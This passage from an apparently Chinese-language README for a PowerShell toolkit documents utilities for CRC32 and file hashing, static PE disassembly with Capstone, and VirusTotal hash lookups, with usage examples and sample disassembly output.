C:\Windows\System32\winipcfile.dll C:\Windows\System32\winipcsecproc.dll C:\Windows\System32\winipsec.dll C:\Windows\SysWOW64\ieuinit.inf C:\Windows\SysWOW64\regini.exe C:\Windows\SysWOW64\secinit.exe C:\Windows\SysWOW64\TpmInit.exe C:\Windows\SysWOW64\userinit.exe C:\Windows\SysWOW64\userinitext.dll C:\Windows\SysWOW64\UXInit.dll C:\Windows\SysWOW64\WimBootCompress.ini C:\Windows\SysWOW64\wininet.dll C:\Windows\SysWOW64\wininetlui.dll C:\Windows\SysWOW64\wininitext.dll C:\Windows\SysWOW64\winipcfile.dll C:\Windows\SysWOW64\winipcsecproc.dll C:\Windows\SysWOW64\winipsec.dll ``` ### Get-CRC32 一个用于未记录的 RtlComputeCrc32 函数的简单包装器。 ``` # Example from string C:\PS> $String = [System.Text.Encoding]::ASCII.GetBytes("Testing!") C:\PS> Get-CRC32 -Buffer $String C:\PS> 2392247274 ``` ### Trace-Execution 使用 Capstone 引擎从 PE（x32/x64）的入口点开始递归反汇编，有效地“跟踪”执行流。遵循以下规则： - 如果跳转地址落在 PE 地址空间内，则跳转被采纳 - 如果调用地址落在 PE 地址空间内，则调用被采纳 - 返回指令被采纳，并使用由 call 指令存储的返回地址 - 间接 call/jmp 不被采纳 - 条件 jmp 不被采纳 - 引用寄存器的 call/jmp 不被采纳 这里有很多边界情况，可能使反汇编不可靠。通常，您反汇编的地址越多，输出就越不可信。调用表可作为参考来评估输出的准确性。 由于反汇编是静态的，基于字节数组工作，因此无论 PowerShell 的位数如何，都可以反汇编 x32/x64 PE 文件。 ``` PS C:\> Trace-Execution -Path .\Desktop\some.exe -InstructionCount 10 [>] 32-bit Image! [?] Call table: Address Mnemonic Taken Reason ------- -------- ----- ------ 0x4AD0829A call Yes Relative offset call 0x4AD07CB7 call No Indirect call [?] Instruction trace: Size Address Mnemonic Operands Bytes RegRead RegWrite ---- ------- -------- -------- ----- ------- -------- 5 0x4AD0829A call 0x4ad07c89 {232, 234, 249, 255...} {esp} 2 0x4AD07C89 mov edi, edi {139, 255, 249, 255...} 1 0x4AD07C8B push ebp {85, 255, 249, 255...} {esp} {esp} 2 0x4AD07C8C mov ebp, esp {139, 236, 249, 255...} 3 0x4AD07C8E sub esp, 0x10 {131, 236, 16, 255...} {eflags} 5 0x4AD07C91 mov eax, dword ptr [0x4ad240ac] {161, 172, 64, 210...} 4 0x4AD07C96 and dword ptr [ebp - 8], 0 {131, 101, 248, 0...} {eflags} 4 0x4AD07C9A and dword ptr [ebp - 4], 0 {131, 101, 252, 0...} {eflags} 1 0x4AD07C9E push ebx {83, 101, 252, 0...} {esp} {esp} 1 0x4AD07C9F push edi {87, 101, 252, 0...} {esp} {esp} 5 0x4AD07CA0 mov edi, 0xbb40e64e {191, 78, 230, 64...} 5 0x4AD07CA5 mov ebx, 0xffff0000 {187, 0, 0, 255...} 2 0x4AD07CAA cmp eax, edi {59, 199, 0, 255...} {eflags} 6 0x4AD07CAC jne 0x4ad1bc8c {15, 133, 218, 63...} {eflags} 1 0x4AD07CB2 push esi {86, 133, 218, 63...} {esp} {esp} 3 0x4AD07CB3 lea eax, dword ptr [ebp - 8] {141, 69, 248, 63...} 1 0x4AD07CB6 push eax {80, 69, 248, 63...} {esp} {esp} 6 0x4AD07CB7 call dword ptr [0x4ad01150] {255, 21, 80, 17...} {esp} 3 0x4AD07CBD mov esi, dword ptr [ebp - 4] {139, 117, 252, 0...} 3 0x4AD07CC0 xor esi, dword ptr [ebp - 8] {51, 117, 248, 0...} {eflags} ``` ### Calculate-Hash 兼容 PowerShell v2 的文件哈希计算脚本。我快速编写了这个脚本，因为 Get-FileHash 仅在 v4+ 中可用。 ``` Get the SHA512 hash of "C:\Some\File.path". C:\PS> Calculate-Hash -Path C:\Some\File.path -Algorithm SHA512 ``` ### Check-VTFile 将文件的 SHA256 哈希提交给 Virus Total，如果哈希已知，则检索扫描报告。这需要您获取一个（免费的）VirusTotal API 密钥。同样，有很多更好的项目可以做这件事，但不兼容 PowerShell v2。 ``` C:\PS> Check-VTFile -Path C:\Some\File.path ```

标签：AI合规, IPv6, Libemu, .NET反射, OpenCanary, PowerShell, Windows API, Windows系统管理, 会话枚举, 协议分析, 多人体追踪, 工具集, 权限提升, 端点可见性, 系统工具, 网络安全, 网络调试, 网络连接监控, 脚本开发, 自动化, 进程创建, 隐私保护